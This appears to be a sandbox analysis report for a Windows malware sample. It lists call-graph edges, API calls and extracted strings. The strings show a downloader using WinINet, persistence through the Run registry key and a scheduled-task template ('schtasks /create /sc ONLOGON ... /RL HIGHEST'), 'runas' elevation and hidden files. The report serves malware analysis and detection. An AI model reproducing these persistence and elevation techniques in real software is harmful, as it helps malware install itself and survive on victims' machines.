11639->11640 11643 c8e9e1 11639->11643 11644 c8e7b5 41 API calls 11640->11644 11641 c8ea0a 11645 c8ea71 11641->11645 11646 c8ea37 11641->11646 11642 c8ea0f 11647 c8e03e 43 API calls 11642->11647 11643->11641 11643->11642 11644->11653 11650 c8e36b 43 API calls 11645->11650 11648 c8ea3c 11646->11648 11649 c8ea57 11646->11649 11647->11653 11651 c8e6e6 43 API calls 11648->11651 11652 c8e562 43 API calls 11649->11652 11650->11653 11651->11653 11652->11653 11653->11567 11653->11568 11655 c8a4d7 11654->11655 11664 c8a4c5 11654->11664 11656 c8dc7f 15 API calls 11655->11656 11655->11664 11657 c8a4fc 11656->11657 11658 c8a50f 11657->11658 11659 c8a504 11657->11659 11661 c8b4f6 14 API calls 11658->11661 11660 c8dc45 __freea 14 API calls 11659->11660 11660->11664 11662 c8a51a 11661->11662 11663 c8dc45 __freea 14 API calls 11662->11663 11663->11664 11664->11582 11666 c8abba 11665->11666 11667 c8abdc 11666->11667 11669 c8ac03 11666->11669 11668 c8daf7 ___std_exception_copy 29 API calls 11667->11668 11670 c8abf9 11668->11670 11669->11670 11671 c8a4b0 15 API calls 11669->11671 11670->11597 11671->11670 11673 c8c335 11672->11673 11675 c8c33c 11672->11675 11674 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11673->11674 11674->11675 11675->11601 11677 c8b66e GetLastError 11676->11677 11678 c8b6af 11676->11678 11679 c8b67d 11677->11679 11685 c8deaa 11678->11685 11680 c8f27d ___std_exception_copy 14 API calls 11679->11680 11681 c8b69a SetLastError 11680->11681 11681->11678 11682 c8b6b6 11681->11682 11683 c8d79d CallUnexpected 39 API calls 11682->11683 11684 c8b6bb 11683->11684 11686 c8c3dd 11685->11686 11687 c8dec1 11685->11687 11689 c8df08 11686->11689 11687->11686 11688 c910de ___scrt_uninitialize_crt 41 API calls 11687->11688 11688->11686 11690 c8df1f 11689->11690 11691 c8c3ea 11689->11691 11690->11691 11692 c90250 ___scrt_uninitialize_crt 41 API calls 11690->11692 11691->11500 11692->11691 11694 c95f3f ___scrt_uninitialize_crt 5 API calls 11693->11694 11695 c93e27 11694->11695 11695->11621 11697 c90502 ___scrt_uninitialize_crt 11696->11697 11698 c905b6 MultiByteToWideChar 11697->11698 11698->11621 11700 c870b8 11699->11700 11703 c86f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11700->11703 11702 c86dc9 11703->11702 11704->10901 11706 c8f097 11705->11706 11707 c8f091 11705->11707 11709 c91430 _unexpected 6 API calls 11706->11709 11711 c8f09b SetLastError 11706->11711 11708 c913f1 _unexpected 6 API calls 11707->11708 11708->11706 11710 c8f0b3 11709->11710 11710->11711 11713 c8d8f2 _unexpected 14 API calls 11710->11713 11714 c8d772 11711->11714 11715 c8f130 11711->11715 11716 c8f0c8 11713->11716 11732 c8d79d 11714->11732 11717 c8d79d CallUnexpected 39 API calls 11715->11717 11718 c8f0d0 11716->11718 11719 c8f0e1 11716->11719 11721 c8f135 11717->11721 11722 c91430 _unexpected 6 API calls 11718->11722 11720 c91430 _unexpected 6 API calls 11719->11720 11723 c8f0ed 11720->11723 11729 c8f0de 11722->11729 11724 c8f108 11723->11724 11725 c8f0f1 11723->11725 11728 c8eea9 _unexpected 14 API calls 11724->11728 11726 c91430 _unexpected 6 API calls 11725->11726 11726->11729 11727 c8dc45 __freea 14 API calls 11727->11711 11730 c8f113 11728->11730 11729->11727 11731 c8dc45 __freea 14 API calls 11730->11731 11731->11711 11743 c91788 11732->11743 11735 c8d7ad 11737 c8d7d6 11735->11737 11738 c8d7b7 IsProcessorFeaturePresent 11735->11738 11740 c8d0b6 __CreateFrameInfo 21 API calls 11737->11740 11739 c8d7c3 11738->11739 11741 c8d978 __CreateFrameInfo 8 API calls 11739->11741 11742 c8d7e0 11740->11742 11741->11737 11773 c916b6 11743->11773 11746 c917cd 11749 c917d9 ___scrt_is_nonwritable_in_current_image 11746->11749 11747 c8f1cc __floor_pentium4 14 API calls 11756 c9180a __CreateFrameInfo 11747->11756 11748 c91829 11751 c8dc32 __floor_pentium4 14 API calls 11748->11751 11749->11747 11749->11748 11750 c9183b __CreateFrameInfo 11749->11750 11749->11756 11753 c91871 __CreateFrameInfo 11750->11753 11786 c8f599 EnterCriticalSection 11750->11786 11752 c9182e 11751->11752 11784 c8db74 11752->11784 11758 c919ab 11753->11758 11759 c918ae 11753->11759 11769 c918dc 11753->11769 11756->11748 11756->11750 11772 c91813 11756->11772 11761 c919b6 11758->11761 11791 c8f5e1 LeaveCriticalSection 11758->11791 11765 c8f07b _unexpected 41 API calls 11759->11765 11759->11769 11763 c8d0b6 __CreateFrameInfo 21 API calls 11761->11763 11764 c919be 11763->11764 11767 c918d1 11765->11767 11766 c8f07b _unexpected 41 API calls 11770 c91931 11766->11770 11768 c8f07b _unexpected 41 API calls 11767->11768 11768->11769 11787 c91957 11769->11787 11771 c8f07b _unexpected 41 API calls 11770->11771 11770->11772 11771->11772 11772->11735 11774 c916c2 ___scrt_is_nonwritable_in_current_image 11773->11774 11779 c8f599 EnterCriticalSection 11774->11779 11776 c916d0 11780 c91712 11776->11780 11779->11776 11783 c8f5e1 LeaveCriticalSection 11780->11783 11782 c8d7a2 11782->11735 11782->11746 11783->11782 11792 c8dac0 11784->11792 11786->11753 11788 c9195b 11787->11788 11789 c91923 11787->11789 11798 c8f5e1 LeaveCriticalSection 11788->11798 11789->11766 11789->11770 11789->11772 11791->11761 11793 c8dad2 ___std_exception_copy 11792->11793 11794 c8daf7 ___std_exception_copy 29 API calls 11793->11794 11795 c8daea 11794->11795 11796 c8b4a0 ___std_exception_copy 41 API calls 11795->11796 11797 c8daf5 11796->11797 11798->11789 11800 c8cf53 11799->11800 11808 c8cf64 11799->11808 11802 c879cf __CreateFrameInfo GetModuleHandleW 11800->11802 11803 c8cf58 11802->11803 11803->11808 11810 c8d007 GetModuleHandleExW 11803->11810 11805 c8cfa2 11805->10546 11815 c8cdf1 11808->11815 11811 c8d046 GetProcAddress 11810->11811 11812 c8d05a 11810->11812 11811->11812 11813 c8d06d FreeLibrary 11812->11813 11814 c8d076 11812->11814 11813->11814 11814->11808 11816 c8cdfd ___scrt_is_nonwritable_in_current_image 11815->11816 11830 c8f599 EnterCriticalSection 11816->11830 11818 c8ce07 11831 c8ce3e 11818->11831 11820 c8ce14 11835 c8ce32 11820->11835 11823 c8cfbd 11860 c8cfee 11823->11860 11825 c8cfc7 11826 c8cfdb 11825->11826 11827 c8cfcb GetCurrentProcess TerminateProcess 11825->11827 11828 c8d007 __CreateFrameInfo 3 API calls 11826->11828 11827->11826 11829 c8cfe3 ExitProcess 11828->11829 11830->11818 11833 c8ce4a ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 11831->11833 11832 c8ceae __CreateFrameInfo 11832->11820 11833->11832 11838 c8d52b 11833->11838 11859 c8f5e1 LeaveCriticalSection 11835->11859 11837 c8ce20 11837->11805 11837->11823 11839 c8d537 __EH_prolog3 11838->11839 11842 c8d283 11839->11842 11841 c8d55e __CreateFrameInfo 11841->11832 11843 c8d28f ___scrt_is_nonwritable_in_current_image 11842->11843 11850 c8f599 EnterCriticalSection 11843->11850 11845 c8d29d 11851 c8d43b 11845->11851 11850->11845 11852 c8d2aa 11851->11852 11853 c8d45a 11851->11853 11855 c8d2d2 11852->11855 11853->11852 11854 c8dc45 __freea 14 API calls 11853->11854 11854->11852 11858 c8f5e1 LeaveCriticalSection 11855->11858 11857 c8d2bb 11857->11841 11858->11857 11859->11837 11863 c9076a 11860->11863 11862 c8cff3 __CreateFrameInfo 11862->11825 11864 c90779 __CreateFrameInfo 11863->11864 11865 c90786 11864->11865 11867 c91333 11864->11867 11865->11862 11868 c912ae _unexpected 5 API calls 11867->11868 11869 c9134f 11868->11869 11869->11865 11871 c8d6dd 11870->11871 11872 c8d6ef ___scrt_uninitialize_crt 11870->11872 11873 c8d6eb 11871->11873 11875 c91c66 11871->11875 11872->10596 11873->10596 11878 c91af7 11875->11878 11881 c91a4b 11878->11881 11882 c91a57 ___scrt_is_nonwritable_in_current_image 11881->11882 11889 c8f599 EnterCriticalSection 11882->11889 11884 c91acd 11898 c91aeb 11884->11898 11885 c91a61 ___scrt_uninitialize_crt 11885->11884 11890 c919bf 11885->11890 11889->11885 11891 c919cb ___scrt_is_nonwritable_in_current_image 11890->11891 11901 c8ed00 EnterCriticalSection 11891->11901 11893 c919d5 ___scrt_uninitialize_crt 11894 c91a21 11893->11894 11902 c91c01 11893->11902 11915 c91a3f 11894->11915 12017 c8f5e1 LeaveCriticalSection 11898->12017 11900 c91ad9 11900->11873 11901->11893 11903 c91c16 ___std_exception_copy 11902->11903 11904 c91c28 11903->11904 11905 c91c1d 11903->11905 11918 c91b98 11904->11918 11906 c91af7 ___scrt_uninitialize_crt 70 API calls 11905->11906 11908 c91c23 11906->11908 11910 c8b4a0 ___std_exception_copy 41 API calls 11908->11910 11911 c91c60 11910->11911 11911->11894 11913 c91c49 11931 c94a20 11913->11931 12016 c8ed14 LeaveCriticalSection 11915->12016 11917 c91a2d 11917->11885 11919 c91bb1 11918->11919 11923 c91bd8 11918->11923 11920 c8ebc5 ___scrt_uninitialize_crt 41 API calls 11919->11920 11919->11923 11921 c91bcd 11920->11921 11942 c9523f 11921->11942 11923->11908 11924 c8ebc5 11923->11924 11925 c8ebd1 11924->11925 11926 c8ebe6 11924->11926 11927 c8dc32 __floor_pentium4 14 API calls 11925->11927 11926->11913 11928 c8ebd6 11927->11928 11929 c8db74 ___std_exception_copy 41 API calls 11928->11929 11930 c8ebe1 11929->11930 11930->11913 11932 c94a3e 11931->11932 11933 c94a31 11931->11933 11935 c94a87 11932->11935 11937 c94a65 11932->11937 11934 c8dc32 __floor_pentium4 14 API calls 11933->11934 11939 c94a36 11934->11939 11936 c8dc32 __floor_pentium4 14 API calls 11935->11936 11938 c94a8c 11936->11938 11983 c9497e 11937->11983 11941 c8db74 ___std_exception_copy 41 API calls 11938->11941 11939->11908 11941->11939 11944 c9524b ___scrt_is_nonwritable_in_current_image 11942->11944 11943 c9528c 11945 c8daf7 ___std_exception_copy 29 API calls 11943->11945 11944->11943 11946 c952d2 11944->11946 11952 c95253 11944->11952 11945->11952 11953 c908df EnterCriticalSection 11946->11953 11948 c952d8 11949 c952f6 11948->11949 11954 c95350 11948->11954 11980 c95348 11949->11980 11952->11923 11953->11948 11955 c95378 11954->11955 11979 c9539b ___scrt_uninitialize_crt 11954->11979 11956 c9537c 11955->11956 11958 c953d7 11955->11958 11957 c8daf7 ___std_exception_copy 29 API calls 11956->11957 11957->11979 11959 c953f5 11958->11959 11960 c962c8 ___scrt_uninitialize_crt 43 API calls 11958->11960 11961 c94ecc ___scrt_uninitialize_crt 42 API calls 11959->11961 11960->11959 11962 c95407 11961->11962 11963 c9540d 11962->11963 11964 c95454 11962->11964 11967 c9543c 11963->11967 11968 c95415 11963->11968 11965 c95468 11964->11965 11966 c954bd WriteFile 11964->11966 11971 c954a9 11965->11971 11972 c95470 11965->11972 11969 c954df GetLastError 11966->11969 11966->11979 11970 c94a9d ___scrt_uninitialize_crt 47 API calls 11967->11970 11975 c94e64 ___scrt_uninitialize_crt 6 API calls 11968->11975 11968->11979 11969->11979 11970->11979 11976 c94f49 ___scrt_uninitialize_crt 7 API calls 11971->11976 11973 c95495 11972->11973 11974 c95475 11972->11974 11977 c9510d ___scrt_uninitialize_crt 8 API calls 11973->11977 11978 c95024 ___scrt_uninitialize_crt 7 API calls 11974->11978 11974->11979 11975->11979 11976->11979 11977->11979 11978->11979 11979->11949 11981 c90902 ___scrt_uninitialize_crt LeaveCriticalSection 11980->11981 11982 c9534e 11981->11982 11982->11952 11984 c9498a ___scrt_is_nonwritable_in_current_image 11983->11984 11996 c908df EnterCriticalSection 11984->11996 11986 c94999 11987 c949de 11986->11987 11997 c909b6 11986->11997 11989 c8dc32 __floor_pentium4 14 API calls 11987->11989 11991 c949e5 11989->11991 11990 c949c5 FlushFileBuffers 11990->11991 11992 c949d1 GetLastError 11990->11992 12013 c94a14 11991->12013 12010 c8dc1f 11992->12010 11996->11986 11998 c909d8 11997->11998 11999 c909c3 11997->11999 12002 c8dc1f ___scrt_uninitialize_crt 14 API calls 11998->12002 12004 c909fd 11998->12004 12000 c8dc1f ___scrt_uninitialize_crt 14 API calls 11999->12000 12001 c909c8 12000->12001 12003 c8dc32 __floor_pentium4 14 API calls 12001->12003 12005 c90a08 12002->12005 12006 c909d0 12003->12006 12004->11990 12007 c8dc32 __floor_pentium4 14 API calls 12005->12007 12006->11990 12008 c90a10 12007->12008 12009 c8db74 ___std_exception_copy 41 API calls 12008->12009 12009->12006 12011 c8f1cc __floor_pentium4 14 API calls 12010->12011 12012 c8dc24 12011->12012 12012->11987 12014 c90902 ___scrt_uninitialize_crt LeaveCriticalSection 12013->12014 12015 c949fd 12014->12015 12015->11939 12016->11917 12017->11900

                                                        Executed Functions

                                                        Function 00C81A80 Relevance: 96.8, APIs: 20, Strings: 35, Instructions: 535memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00C81E2D
                                                        • lstrlenW.KERNEL32(00000000), ref: 00C81E34
                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 00C81E46
                                                        • RegCloseKey.ADVAPI32(?), ref: 00C81E4F
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,771AF380,00000000,00000000), ref: 00C81E73
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81E76
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00C81E88
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C81EA3
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81EA6
                                                        • wsprintfW.USER32 ref: 00C8204E
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C8205E
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C82061
                                                        • wsprintfW.USER32 ref: 00C82449
                                                        • ShellExecuteW.SHELL32(00000000,runas,?,?,00000000,00000000), ref: 00C8246A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82478
                                                        • HeapFree.KERNEL32(00000000), ref: 00C8247B
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82480
                                                        • HeapFree.KERNEL32(00000000), ref: 00C82483
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C8248D
                                                        • HeapFree.KERNEL32(00000000), ref: 00C82490
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree$wsprintf$CloseDirectoryExecuteOpenShellSystemValuelstrlen
                                                        • String ID: "$#$#$$$$$%$%s\schtasks.exe$/c "%s"$/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST$;$>$?$?$C$I$L$L$L$L$L$L$N$N$b$b$cmd.exe$i$invalid distance code$invalid literal/length code$l$need dictionary$p$runas$y$z
                                                        • API String ID: 2564131513-3794329617
                                                        • Opcode ID: 85d8e7683398652a5c1f9c6c945f4ff55aad10e324f980d5cb7228b9f28cc282
                                                        • Instruction ID: 0be064584e55fbdad786df052a26b5dceeb6ab8b6e7e39911623bb35120697dd
                                                        • Opcode Fuzzy Hash: 85d8e7683398652a5c1f9c6c945f4ff55aad10e324f980d5cb7228b9f28cc282
                                                        • Instruction Fuzzy Hash: C142D928810269D9CB20EFA1A8087FEB6F0FF3D715F41505BE588EB560F7B84985DB19
                                                        Function 00C81420 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 294memorysleepprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 18 c81420-c81473 GetProcessHeap HeapAlloc 19 c81479-c8147b 18->19 20 c81847-c81857 call c86f60 18->20 21 c8164e-c81740 19->21 22 c81481 19->22 24 c81744-c8174d 21->24 25 c81487-c81489 22->25 27 c8174f-c81753 24->27 28 c81755-c8176f lstrcatW PathFileExistsW 24->28 29 c81490-c814a6 call c825b0 25->29 27->24 30 c8183b-c81841 GetProcessHeap HeapFree 28->30 31 c81775-c81795 GetCurrentProcess OpenProcessToken 28->31 37 c814a8-c814bd Sleep 29->37 38 c814c4-c814f6 call c86dd0 ExpandEnvironmentStringsW SHCreateDirectoryExW 29->38 30->20 33 c817c8-c81823 call c81a80 call c88800 CreateProcessW 31->33 34 c81797-c817c2 GetTokenInformation CloseHandle 31->34 33->30 50 c81825-c81839 CloseHandle * 2 33->50 34->33 37->29 41 c814bf 37->41 45 c814f8-c814fd 38->45 46 c81503-c81528 SetFileAttributesW 38->46 42 c81632-c81648 41->42 42->21 42->25 45->42 45->46 48 c8152a-c8152f 46->48 49 c81531-c81534 46->49 51 c8155a-c81563 48->51 52 c8153d-c81554 call c86120 49->52 53 c81536-c8153b 49->53 50->30 55 c81569 51->55 56 c8162c 51->56 52->51 53->51 58 c81570-c81588 55->58 56->42 59 c8158a-c8158f 58->59 60 c81591-c81594 58->60 63 c815ad-c815c6 GetProcessHeap HeapAlloc 59->63 61 c8159d-c815a8 call c86120 60->61 62 c81596-c8159b 60->62 61->63 62->63 65 c815c8-c815de PathCombineW 63->65 66 c81619 63->66 67 c815e0-c815e5 65->67 68 c815e7-c815ea 65->68 69 c8161f-c81626 66->69 70 c81600-c81617 GetProcessHeap HeapFree 67->70 71 c815ec-c815f1 68->71 72 c815f3-c815fb call c869e0 68->72 69->56 69->58 70->69 71->70 72->70
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C81460
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81463
                                                        • Sleep.KERNEL32(000003E8), ref: 00C814AD
                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104), ref: 00C814E3
                                                        • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000), ref: 00C814EE
                                                        • SetFileAttributesW.KERNEL32(00000000,00000002), ref: 00C81506
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00C815B9
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C815BC
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 00C815D6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C8160E
                                                        • HeapFree.KERNEL32(00000000), ref: 00C81611
                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00C81760
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00C81767
                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 00C81786
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C8178D
                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C817B0
                                                        • CloseHandle.KERNEL32(?), ref: 00C817C2
                                                          • Part of subcall function 00C825B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                          • Part of subcall function 00C825B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                          • Part of subcall function 00C825B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                          • Part of subcall function 00C825B0: HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                          • Part of subcall function 00C825B0: RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                          • Part of subcall function 00C825B0: RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826E6
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 00C8181B
                                                        • CloseHandle.KERNEL32(?), ref: 00C81831
                                                        • CloseHandle.KERNEL32(?), ref: 00C81839
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C8183E
                                                        • HeapFree.KERNEL32(00000000), ref: 00C81841
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$CloseHandleInternet$AllocFileFreeOpen$CreatePathToken$AllocateAttributesCombineCurrentDirectoryEnvironmentExistsExpandInformationReadSleepStringslstrcat
                                                        • String ID: D$K$Software\Microsoft\Windows\CurrentVersion\Run$V$x
                                                        • API String ID: 4228357295-1478008780
                                                        • Opcode ID: 25c37558f4549876201c7b8a18bc3c11cdb4a5662bb15741e4b886d8806e5f47
                                                        • Instruction ID: 0bfb090e78a2ef204b3b4e747b277be24a5cf45f06dc57c5a6c82b6ba403d3c7
                                                        • Opcode Fuzzy Hash: 25c37558f4549876201c7b8a18bc3c11cdb4a5662bb15741e4b886d8806e5f47
                                                        • Instruction Fuzzy Hash: AFC19074900219ABCB20AFA5DC4CBAEB7F8FF1D708F14405AF959E7250EB749981CB19
                                                        Function 00C81000 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 343memorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrcmpA.KERNEL32(00000000,?), ref: 00C810A2
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00C810C7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C810CE
                                                        • lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 00C810EC
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00C8123C
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81243
                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 00C81285
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8128C
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C812E7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C812EE
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C81333
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8133A
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C8137F
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81386
                                                        • GetProcessHeap.KERNEL32(00000008,00000049), ref: 00C813E5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C813EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$lstrcmplstrlen
                                                        • String ID: M1Zw0w66GQYFi
                                                        • API String ID: 522894340-229323296
                                                        • Opcode ID: a4ff0d740bf2434099dd6e43dc6e8ee8c23c0149558b3616bf98b1b30a6a721d
                                                        • Instruction ID: b81846291d439628f183adb725027f56a3eb256efaf86af5999c7396d18d4801
                                                        • Opcode Fuzzy Hash: a4ff0d740bf2434099dd6e43dc6e8ee8c23c0149558b3616bf98b1b30a6a721d
                                                        • Instruction Fuzzy Hash: 23D10571C041659FDB10DFA8C8986FEBBF8FF19314F1841AAE895D7342D6399A05CBA0
                                                        Function 00C825B0 Relevance: 19.6, APIs: 13, Instructions: 108memorynetworkfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                        • InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                        • GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0000000100000000), ref: 00C82668
                                                        • RtlReAllocateHeap.NTDLL(00000000), ref: 00C8266B
                                                        • GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                        • InternetCloseHandle.WININET(?), ref: 00C826E6
                                                        • InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Internet$Process$AllocateCloseHandleOpen$AllocFileFreeRead
                                                        • String ID:
                                                        • API String ID: 1681177425-0
                                                        • Opcode ID: 042ac669ed9106e2b2b20f6d2ed08ccf12251e5c64973e35544f4882bba4f7b0
                                                        • Instruction ID: d62234dd90cc3c7df30153a5f630705ff6ea4d312b5a765bf9dcc539f1906e17
                                                        • Opcode Fuzzy Hash: 042ac669ed9106e2b2b20f6d2ed08ccf12251e5c64973e35544f4882bba4f7b0
                                                        • Instruction Fuzzy Hash: D5313E71900229ABDB609B69DC4DF9EBBFCFF89714F0081A9B55993250DE309E44CFA4
                                                        Function 00C869E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330filetimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 c869e0-c869ff 135 c86a01-c86a0b 134->135 136 c86a54-c86a63 134->136 135->136 139 c86a0d-c86a12 135->139 137 c86a7d-c86a80 136->137 138 c86a65-c86a7a call c86f60 136->138 141 c86ab8-c86abd 137->141 142 c86a82-c86a84 137->142 139->136 143 c86a14-c86a18 139->143 144 c86abf 141->144 145 c86b13-c86b30 call c86120 141->145 142->141 147 c86a86-c86ab5 call c85540 142->147 148 c86a1a-c86a20 call c8c52b 143->148 149 c86a23-c86a2d 143->149 150 c86ac0-c86ac2 144->150 165 c86b6e-c86b7e 145->165 166 c86b32-c86b35 145->166 147->141 148->149 151 c86a2f-c86a32 call c847e0 149->151 152 c86a37-c86a4d call c8c52b 149->152 156 c86b0c-c86b11 150->156 157 c86ac4-c86ac8 150->157 151->152 152->136 156->145 156->150 157->156 163 c86aca-c86ad1 157->163 163->156 167 c86ad3-c86b09 call c85540 163->167 168 c86b9e-c86bb5 call c8a23b 165->168 169 c86b80-c86b84 165->169 170 c86b50 166->170 171 c86b37-c86b3a 166->171 167->156 186 c86bc2-c86bce 168->186 187 c86bb7-c86bc0 168->187 174 c86b91-c86b94 169->174 175 c86b86-c86b8a 169->175 172 c86b52-c86b6b call c86830 call c86f60 170->172 171->170 177 c86b3c-c86b3f 171->177 181 c86b96-c86b9c 174->181 175->174 180 c86b8c-c86b8f 175->180 183 c86b48-c86b4e 177->183 184 c86b41-c86b46 177->184 180->181 181->168 